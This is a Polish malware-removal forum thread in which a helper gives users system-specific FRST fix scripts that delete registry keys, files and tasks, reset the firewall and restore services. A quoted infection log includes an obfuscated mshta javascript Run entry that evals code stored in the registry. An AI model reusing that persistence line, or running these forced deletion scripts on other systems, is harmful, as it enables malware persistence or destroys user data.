jessika Post usuwam. Zaznaczasz że w msconfig wyłączona mnogość usług, przy czym zalecasz do włączenia tylko dwie (via services.msc) i jednocześnie usuwasz klucze msconfig (ich usunięcie spowoduje, że nie będzie się dało zastosować msconfig do odkręcenia akcji). Skoro msconfig został użyty do ich wyłączenia, to msconfig się stosuje by to odwrócić. munirowata22 1. Start > w polu szukania wpisz msconfig > z prawokliku Uruchom jako Administrator > w karcie Usługi zaznacz wszystkie odznaczone i zresetuj komputer. MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: AeLookupSvc => 3 MSCONFIG\Services: ALG => 3 MSCONFIG\Services: AppIDSvc => 3 MSCONFIG\Services: AppMgmt => 3 MSCONFIG\Services: aspnet_state => 3 MSCONFIG\Services: AudioEndpointBuilder => 2 MSCONFIG\Services: AudioSrv => 2 MSCONFIG\Services: AxInstSV => 3 MSCONFIG\Services: BDESVC => 3 MSCONFIG\Services: BFE => 2 MSCONFIG\Services: BITS => 3 MSCONFIG\Services: Browser => 3 MSCONFIG\Services: BrYNSvc => 3 MSCONFIG\Services: bthserv => 3 MSCONFIG\Services: CertPropSvc => 3 MSCONFIG\Services: clr_optimization_v4.0.30319_32 => 2 MSCONFIG\Services: clr_optimization_v4.0.30319_64 => 2 MSCONFIG\Services: COMSysApp => 3 MSCONFIG\Services: cphs => 3 MSCONFIG\Services: CryptSvc => 2 MSCONFIG\Services: CscService => 2 MSCONFIG\Services: defragsvc => 3 MSCONFIG\Services: Dhcp => 2 MSCONFIG\Services: DiagTrack => 2 MSCONFIG\Services: Dnscache => 2 MSCONFIG\Services: dot3svc => 2 MSCONFIG\Services: DPS => 2 MSCONFIG\Services: DsiWMIService => 2 MSCONFIG\Services: EapHost => 3 MSCONFIG\Services: EFS => 3 MSCONFIG\Services: ehRecvr => 3 MSCONFIG\Services: ehSched => 3 MSCONFIG\Services: ePowerSvc => 2 MSCONFIG\Services: eventlog => 2 MSCONFIG\Services: EventSystem => 2 MSCONFIG\Services: Fax => 3 MSCONFIG\Services: fdPHost => 3 MSCONFIG\Services: FDResPub => 3 MSCONFIG\Services: FLEXnet Licensing Service 64 => 3 MSCONFIG\Services: FontCache => 2 MSCONFIG\Services: gupdate => 2 MSCONFIG\Services: gupdatem => 3 MSCONFIG\Services: hidserv => 3 MSCONFIG\Services: hkmsvc => 3 MSCONFIG\Services: HomeGroupListener => 3 MSCONFIG\Services: HomeGroupProvider => 3 MSCONFIG\Services: IAStorDataMgrSvc => 2 MSCONFIG\Services: idsvc => 3 MSCONFIG\Services: IEEtwCollectorService => 3 MSCONFIG\Services: IKEEXT => 2 MSCONFIG\Services: IPBusEnum => 2 MSCONFIG\Services: iphlpsvc => 2 MSCONFIG\Services: KeyIso => 3 MSCONFIG\Services: KtmRm => 3 MSCONFIG\Services: LanmanServer => 2 MSCONFIG\Services: LanmanWorkstation => 2 MSCONFIG\Services: lltdsvc => 3 MSCONFIG\Services: lmhosts => 2 MSCONFIG\Services: Microsoft Office Groove Audit Service => 3 MSCONFIG\Services: mitsijm2014 => 2 MSCONFIG\Services: MMCSS => 2 MSCONFIG\Services: MpsSvc => 2 MSCONFIG\Services: MSDTC => 3 MSCONFIG\Services: MSiSCSI => 3 MSCONFIG\Services: msiserver => 3 MSCONFIG\Services: napagent => 3 MSCONFIG\Services: Netlogon => 3 MSCONFIG\Services: Netman => 3 MSCONFIG\Services: netprofm => 3 MSCONFIG\Services: NlaSvc => 2 MSCONFIG\Services: nsi => 2 MSCONFIG\Services: odserv => 3 MSCONFIG\Services: ose => 3 MSCONFIG\Services: p2pimsvc => 3 MSCONFIG\Services: p2psvc => 3 MSCONFIG\Services: PcaSvc => 2 MSCONFIG\Services: PeerDistSvc => 3 MSCONFIG\Services: PerfHost => 3 MSCONFIG\Services: pla => 3 MSCONFIG\Services: PNRPAutoReg => 3 MSCONFIG\Services: PNRPsvc => 3 MSCONFIG\Services: PolicyAgent => 3 MSCONFIG\Services: Power => 2 MSCONFIG\Services: ProtectedStorage => 3 MSCONFIG\Services: PSI_SVC_2_x64 => 2 MSCONFIG\Services: QWAVE => 3 MSCONFIG\Services: RasAuto => 3 MSCONFIG\Services: RasMan => 3 MSCONFIG\Services: RemoteRegistry => 3 MSCONFIG\Services: RpcLocator => 3 MSCONFIG\Services: SamSs => 2 MSCONFIG\Services: SCardSvr => 3 MSCONFIG\Services: SCPolicySvc => 3 MSCONFIG\Services: SDRSVC => 3 MSCONFIG\Services: seclogon => 3 MSCONFIG\Services: SENS => 2 MSCONFIG\Services: SensrSvc => 3 MSCONFIG\Services: SessionEnv => 3 MSCONFIG\Services: ShellHWDetection => 2 MSCONFIG\Services: SNMPTRAP => 3 MSCONFIG\Services: Spooler => 2 MSCONFIG\Services: sppuinotify => 3 MSCONFIG\Services: SSDPSRV => 2 MSCONFIG\Services: SstpSvc => 3 MSCONFIG\Services: stisvc => 2 MSCONFIG\Services: SwitchBoard => 3 MSCONFIG\Services: swprv => 3 MSCONFIG\Services: SysMain => 2 MSCONFIG\Services: TabletInputService => 3 MSCONFIG\Services: TapiSrv => 3 MSCONFIG\Services: TBS => 3 MSCONFIG\Services: TermService => 3 MSCONFIG\Services: Themes => 2 MSCONFIG\Services: THREADORDER => 3 MSCONFIG\Services: TrkWks => 2 MSCONFIG\Services: TrustedInstaller => 3 MSCONFIG\Services: UI0Detect => 3 MSCONFIG\Services: UmRdpService => 3 MSCONFIG\Services: upnphost => 2 MSCONFIG\Services: UxSms => 2 MSCONFIG\Services: VaultSvc => 3 MSCONFIG\Services: vds => 3 MSCONFIG\Services: VSS => 3 MSCONFIG\Services: W32Time => 3 MSCONFIG\Services: WatAdminSvc => 3 MSCONFIG\Services: wbengine => 3 MSCONFIG\Services: WbioSrvc => 3 MSCONFIG\Services: wcncsvc => 3 MSCONFIG\Services: WcsPlugInService => 3 MSCONFIG\Services: WdiServiceHost => 3 MSCONFIG\Services: WdiSystemHost => 3 MSCONFIG\Services: WebClient => 3 MSCONFIG\Services: Wecsvc => 3 MSCONFIG\Services: wercplsupport => 3 MSCONFIG\Services: WerSvc => 3 MSCONFIG\Services: WinHttpAutoProxySvc => 3 MSCONFIG\Services: Winmgmt => 2 MSCONFIG\Services: WinRM => 3 MSCONFIG\Services: Wlansvc => 2 MSCONFIG\Services: wltrysvc => 2 MSCONFIG\Services: wmiApSrv => 3 MSCONFIG\Services: WMPNetworkSvc => 3 MSCONFIG\Services: WPCSvc => 3 MSCONFIG\Services: WPDBusEnum => 3 MSCONFIG\Services: wscsvc => 2 MSCONFIG\Services: WSearch => 2 MSCONFIG\Services: wuauserv => 2 MSCONFIG\Services: wudfsvc => 3 MSCONFIG\Services: WwanSvc => 3 2. Zrób nowy log FRST z opcji Scan - zaznacz ponownie pole Addition, by powstały dwa logi.

Jeszcze usuń szczątki po odinstalowanych programach - zakładam, że Firefox jeszcze nie został zainstalowany (trzymam się tego co mówi ostatni podany log). Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: BootExecute: autocheck autochk * sdnclean64.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\Program Files (x86)\Spybot - Search & Destroy 2 RemoveDirectory: C:\ProgramData\Mozilla RemoveDirectory: C:\ProgramData\Spybot - Search & Destroy RemoveDirectory: C:\Users\Ewa\AppData\Local\Mozilla RemoveDirectory: C:\Users\Ewa\AppData\Roaming\Mozilla RemoveDirectory: C:\Users\Ewa\AppData\Roaming\tor RemoveDirectory: C:\windows\System32\Tasks\Safer-Networking DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking CMD: del /q C:\Users\Ewa\AppData\Roaming\icon.ico CMD: del /q C:\windows\system32\CFG4132664122 Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Nastąpi restart. Przedstaw wynikowy fixlog.txt.

Nic szczególnego, wykryte instalatory zawierające adware, w tym "Asystenty pobierania" dobrychprogramów i Softonic. O tym wszystkim tu: KLIK. Folder C:\Users\wangzhisong tworzy program Mobogenie - skasyfikowany jako niepożądany (typ PUP/adware). Mobogenie nie ma w Twoim systemie w formie zainstalowanej, jest więc to szczątek. Folder w całości możesz usunąć. Oceniając ostatnie dostarczone logi, jeszcze drobne puste wpisy do usunięcia (w międzyczasie usuwałeś programy). Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-1365672938-4047589735-543654078-1000\...\Run: [ALLUpdate] => "C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" BHO-x32: IplexToALLPlayer -> {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} -> C:\PROGRA~2\ALLPLA~1\Iplex\IPLEXT~1.DLL No File FF Plugin-x32: @videolan.org/vlc,version=2.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll No File FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll No File CMD: del /q C:\Users\Ola\Downloads\Everest-Home-Edition(11558)-dp.jse Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt.

1. MBAM wykrył drobne rzeczy w kluczach Google Chrome - usuń za pomocą programu. 2. Zastosuj DelFix. Pobrany GMER usuń ręcznie. 3. Na wszelki wypadek pozmieniaj hasła logowania w ważnych serwisach (banki, poczta, etc.). To tyle.

Poproszę o dostarczenie obowiązujących tu logów FRST i GMER: KLIK.

Ale przecież tu nie koniec. Zrób obowiązujące logi FRST (mają powstać 3) oraz GMER do wglądu na okoliczność infekcji.

Podany tu Fixlist miał błędy - "MD:" zamiast "CMD:", nic nie zostanie odkryte na urządzeniach. Usuwam ten post. Poprawiona wersja: 1. Odinstaluj program ze zintegrowanym adware: Ace Stream Media 2.2.2-next. 2. Zakładam, że dyski przenośne nadal są widoczne pod literami H i J. Otwórz Notatnik i wklej w nim: CloseProcesses: R2 VSSS; C:\Users\tomek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe [100476224 2015-06-23] (Microsoft Corporation) [File not signed] HKLM\...\Policies\Explorer\Run: [1577572935] => C:\ProgramData\msshb.exe [80441344 2010-11-21] () HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 HKLM\...\Policies\Explorer: [HideSCAHealth] 1 BootExecute: autocheck autochk * sdnclean64.exe Task: {7143BDD8-9BE4-4FF8-94DD-D408E575D7C0} - System32\Tasks\AutoKMS => C:\windows\AutoKMS\AutoKMS.exe Task: C:\windows\Tasks\AutoKMS.job => C:\windows\AutoKMS\AutoKMS.exe C:\Program Files\*.exe C:\ProgramData\msshb.exe C:\Users\tomek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe H:\*.lnk J:\*.lnk CMD: attrib /d /s -s -h H:\* CMD: attrib /d /s -s -h J:\* Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wejdź w Tryb awaryjny Windows. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wejdź na dyski H + J, powinny być widoczne foldery "bez nazwy" - przenieś dane z tych folderów poziom wyżej, po czym foldery te skasuj. 4. Przywracanie systemu zostało wyłączone (prawdopodobnie przez infekcję): ==================== Restore Points ========================= ATTENTION: System Restore is disabled Wejdź do interfejsu konfiguracji Przywracania: KLIK. Włącz Ochronę dla dysku C. 5. Mataczyłeś w msconfig, jest mnóstwo wyłączonych usług, część z nich nie powinna być wyłączona. W msconfig w karcie Usługi zaznacz z powrotem większość wpisów, te jednak możesz zostawić wyłączone: MSCONFIG\Services: Adobe LM Service => 3 MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: Autodesk Content Service => 2 MSCONFIG\Services: gupdate => 2 MSCONFIG\Services: gupdatem => 3 MSCONFIG\Services: IAStorDataMgrSvc => 2 MSCONFIG\Services: NvNetworkService => 2 MSCONFIG\Services: NvStreamSvc => 2 MSCONFIG\Services: nvsvc => 2 MSCONFIG\Services: nvUpdatusService => 2 MSCONFIG\Services: RemoteRegistry => 3 MSCONFIG\Services: ScrybeUpdater => 2 MSCONFIG\Services: ServiceLayer => 3 MSCONFIG\Services: SkypeUpdate => 2 MSCONFIG\Services: SpliCamService => 2 MSCONFIG\Services: Stereo Service => 2 MSCONFIG\Services: WMPNetworkSvc => 2 6. Na Pulpicie jest ukryty następujący "ruski" folder - czy jesteś świadomy jego obecności? 2015-06-06 00:14 - 2015-02-21 08:46 - 00000000 __SHD C:\Users\tomek\Desktop\Создаю свой сайт 7. Zrób nowe logi: FRST z opcji Scan (bez Addition i Shortcut), USBFix z opcji Listing oraz Farbar Service Scanner. Dołącz też plik fixlog.txt.

Proszę trzymaj się poprzedniego serwisu wklej.org, jeśli logi są doczepiane nie przez załączniki forum (ale preferuję załączniki forum). Serwis wklejto nie jest dobry, zniekształca kodowanie raportów (specjalne znaki Unicode są zmienione i już nieprzetwarzalne przez FRST). Co widać w raportach: 1. Problem infekcji w ogóle nie rozwiązany - infekcja grasuje na dobre - m.in. Sathurbot w ShellIconOverlayIdentifiers i coś co wygląda na wariant infekcji w rodzaju Poweliks / Xswkit. Prócz tego, jest też adware w Firefox. 2. Druga sprawa - szykuje się też problem sprzętowy i będzie potem analizowany z osobna w innym dziale (Hardware). Dziennik zdarzeń notuje bad sektory dysku: System errors: ============= Error: (06/23/2015 08:30:08 PM) (Source: disk) (EventID: 7) (User: ) Description: The device, \Device\Harddisk0\DR0, has a bad block. Wstępne akcje do wdrożenia pod kątem infekcji: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-05-09] () HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [{B207AD06-2E17-B7AE-DDC4-9BEB3C8557B4}] => C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpC443.exe [147456 2015-06-26] (Spazio irradiato) HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [**a40298fb] => mshta javascript:joLAa8mI="ckNa";s5C=new%20ActiveXObject("WScript.Shell");cat9SDS="lkCtOxBnB";EX8zw=s5C.RegRead("HKCU\\software\\c17946de\\bdcff458");L7o4EKNG="y";eval(EX8zw);EhtnPXXk7="Jc"; HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [Ewption] => C:\Users\Cezary\AppData\Local\Ewption\tmpC443.exe [147456 2015-06-26] (Spazio irradiato) HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [ProxyGate] => C:\Users\Cezary\AppData\Roaming\ProxyGate\MainService.exe R0 3C325EAB; C:\Windows\System32\drivers\3C325EAB.sys [457824 2015-05-09] (Kaspersky Lab ZAO) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\3C325EAB.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\3C325EAB.sys => ""="Driver" Task: {6B3467E3-0E13-4B8A-AE31-7838931C70D5} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe Task: {A865DAAC-2E82-4E94-957E-9E9D996EF901} - System32\Tasks\{DB176E6A-E593-4BAF-A38D-E965F38CEB05} => pcalua.exe -a "C:\Users\Cezary\AppData\Roaming\Any Send Packages\uninstaller.exe" -c /Uninstall /NM="Any Send Packages" /AN="" /MBN="Any Send Packages" Task: {A9C6DEB1-C97C-4240-8EC2-71AE96E633BC} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2015-06-24] () Task: {AF859B7D-8A89-4CDE-8582-3AEBD22BC8D5} - System32\Tasks\{7EA6F83A-7028-4153-B8F4-2A074365744C} => pcalua.exe -a C:\Users\Cezary\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveSetup.exe -c /uninstall Task: {B22EB681-CDB3-4B9D-8ADC-7052995D9949} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS\AutoKMS.exe Task: {C99E0E80-BB4B-4F67-A840-98209D263A83} - System32\Tasks\{B9260C24-276A-44BF-A844-BC40E35A8BFD} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com Task: {EC54CC44-8812-42C0-8DEC-AE05D6FAAC70} - System32\Tasks\{999C1430-8EBE-4118-8C1B-69F4AF905631} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com Task: {FDD60CF7-5388-4CE0-BF63-947E38D88B77} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2015-06-24] () Task: C:\WINDOWS\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe Task: C:\WINDOWS\Tasks\AutoKMSDaily.job => C:\Windows\AutoKMS\AutoKMS.exe CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {69ABAE4C-47BC-4EAD-A2B3-ED08ED617830} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK FF Plugin-x32: @qq.com/QQPhotoDrawEx -> C:\Program Files (x86)\Tencent\Qzone\Ver_247.312\npQQPhotoDrawEx.dll No File FF HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Firefox\Extensions: [speedtest4354@BestOffers] - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers FF Extension: Speed Test 127 - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers [2014-02-03] C:\Program Files (x86)\QQMailPlugin C:\ProgramData\2320303d353737_c C:\ProgramData\@system.temp C:\ProgramData\@system3.att C:\ProgramData\Microsoft\Performance C:\ProgramData\TEMP C:\Users\Cezary\AppData\Local\Ewption C:\Users\Cezary\AppData\Roaming\麽鎒駓覜 C:\Users\Cezary\AppData\Roaming\my_intel.sys C:\Users\Cezary\AppData\Roaming\sp_data.sys C:\Users\Cezary\AppData\Roaming\ChromeUpdate C:\Users\Cezary\AppData\Roaming\ProxyGate C:\Windows\System32\drivers\3C325EAB.sys C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 DeleteKey: HKCU\Software\c17946de DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run CMD: netsh advfirewall reset CMD: dir /a C:\Users\Cezary\AppData\Roaming\Chromodo Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść obok narzędzia FRST. Przejdź w Tryb awaryjny Windows, by ani infekcja ani COMODO nie zablokowały FRST. Uruchom FRST i kliknij w Fix. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Przez Panel sterowania odinstaluj sponsorowany zbędnik McAfee Security Scan Plus. jeśli nie używasz, pozbądź się też Skype Click to Call. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 4. Zrób nowe logi: FRST z opcji Scan (z Addition) oraz Farbar Service Scanner. Dołącz też plik fixlog.txt. Wszystkie logi proszę załącz w formie oryginalnej, tzn. jako załączniki forum a nie na serwisach wklejkowych.

Nie wiem. Jestem w stanie sprawdzić tylko te urządzenia USB, które zostały podpięte do Windows i wykazane w skanie USBFix. Wszystko wykonane, z tym że aktualnie log USBFix robiłeś bez podpiętego jednego z dysków USB (mapowany wcześniej jako H). Kolejne poprawki: 1. Otwórz Notatnik i wklej w nim: Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f RemoveDirectory: C:\FRST\Quarantine Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt. 2. Zrób pełny skan systemu za pomocą Malwarebytes Anti-Malware. Jeśli coś wykryje, przedstaw raport wynikowy.

szyszka, ten wadliwy post z sieczką OTL usuwam. Nie objaśniłeś w ogóle też tematu zasadniczego, tzn. na czym polega "nie działanie EXE" (jaki błąd). Jedyne co tu pasuje do opisu to te wartości niedomyślne (były czymś modyfikowane, w HKU nie ma domyślnie żadnych asocjacji EXE): HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\.exe: exefile => "%1" %* HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\exefile: "%1" %* Są też i różne szczątki adware do usunięcia, w tym cała przeglądarka Google Chrome przekonwertowana przez adware z wersji stabilnej do developerskiej. Wstępnie: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\.exe: exefile => "%1" %* HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\exefile: "%1" %* HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service" Task: {0DE060A0-B70C-4940-ACE3-B767A1A29D1C} - System32\Tasks\{D88536E6-6347-4A9D-BCCA-070A96D4278E} => pcalua.exe -a C:\Users\Szyszka\Desktop\pity2011ngsetup.exe -d C:\Users\Szyszka\Desktop Task: {3997BD38-B4CF-4E24-BA01-4BEE5C4C231D} - System32\Tasks\{5A731068-33F3-4589-AD74-AC0B2A2010BE} => D:\-=PULPIT=-\accaunt stream\accaunt stream\AccountStreamHotmail.exe Task: {6B511F6F-9E51-4041-90E7-A9FBA4A1DB58} - System32\Tasks\{02706A6E-53A1-473F-9A90-2C5E248DFA5F} => D:\-=PULPIT=-\niszki z łowcy\Dragon Ball Xenoverse\Dragon Ball Xenoverse.exe Task: {8A7C714C-C907-45AE-8EFC-61682EC52988} - System32\Tasks\{62D21132-DC3B-4760-B12F-D23A218A89DE} => pcalua.exe -a "C:\Program Files\PITy\PITy2011NG\unins000.exe" Task: {9BE97635-4286-4F15-BA78-45C2BAA79EA7} - System32\Tasks\e-pity2012_styczen => C:\Program Files\e-file\e-pity2012\signxml.exe Task: {B2F03C29-533D-4535-9DB6-1DC6C7B41A9C} - System32\Tasks\{98F508C6-98BA-4ACD-B651-4CB9B54F2C76} => D:\-=PULPIT=-\niszki z łowcy\Dragon Ball Xenoverse\Dragon Ball Xenoverse.exe Task: {C4184739-699F-4035-B77D-6D45E088FE40} - System32\Tasks\{CC7C7B81-0F77-490C-8C01-52818FF0B98A} => D:\-=PULPIT=-\niszki z łowcy\Dragon Ball Xenoverse\Dragon Ball Xenoverse.exe Task: {C6E1FF7E-5057-440F-970C-414BC34A3EEA} - System32\Tasks\{9BCD6F2A-17D7-464E-BD53-3567CBCA3F9C} => pcalua.exe -a "C:\Users\Szyszka\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQLGWJHL\pity2011ngsetup[1].exe" -d C:\Users\Szyszka\Desktop Task: {D177D59F-8BA0-4D04-9BE0-D2B391ED9839} - System32\Tasks\e-pity2012_kwiecien => C:\Program Files\e-file\e-pity2012\signxml.exe Task: {D2F2480A-C93B-44E1-8D4C-2F0628A72196} - System32\Tasks\{1FD00C96-AE97-4A1F-B94D-6734836C4C7D} => C:\Users\Szyszka\Desktop\Office2007HNS_MSLT_PL.EXE Task: {DED8503A-2C87-4B27-BD59-12F02617A24D} - System32\Tasks\{6DDDB839-87C8-4A89-827E-C7DF2CA99317} => C:\Program Files\Mass Video Downloader\MassVideoDownloader.exe Task: {E9E5251E-7D8B-44F0-AB10-A7EB36AF61B1} - System32\Tasks\{A9A74089-328D-4C0E-8822-45DCC268CBD0} => C:\Program Files\U2bviews\U2bviews Software\U2bviews Software.exe Task: {EF6268DA-E9D9-4128-BE7B-60DBA73CB128} - System32\Tasks\{920FF6A2-96B9-44BF-AD31-E8BD289BC8D8} => D:\-=PULPIT=-\PPJoyJoy.exe S3 ALSysIO; \??\C:\Users\Szyszka\AppData\Local\Temp\ALSysIO.sys [X] U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S3 MBAMSwissArmy; \??\C:\windows\system32\drivers\MBAMSwissArmy.sys [X] U4 WMCoreService; No ImagePath Startup: C:\Users\Szyszka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-09-28] StartMenuInternet: (HKLM) Opera - c:\program files\opera\opera.exe http://www.delta-homes.com/?utm_source=b&utm_medium=wpm0613&utm_campaign=installer&utm_content=sc&from=wpm0613&uid=TOSHIBAXMK5055GSX_209FP0ZFTXX209FP0ZFT&ts=1402567402 GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction 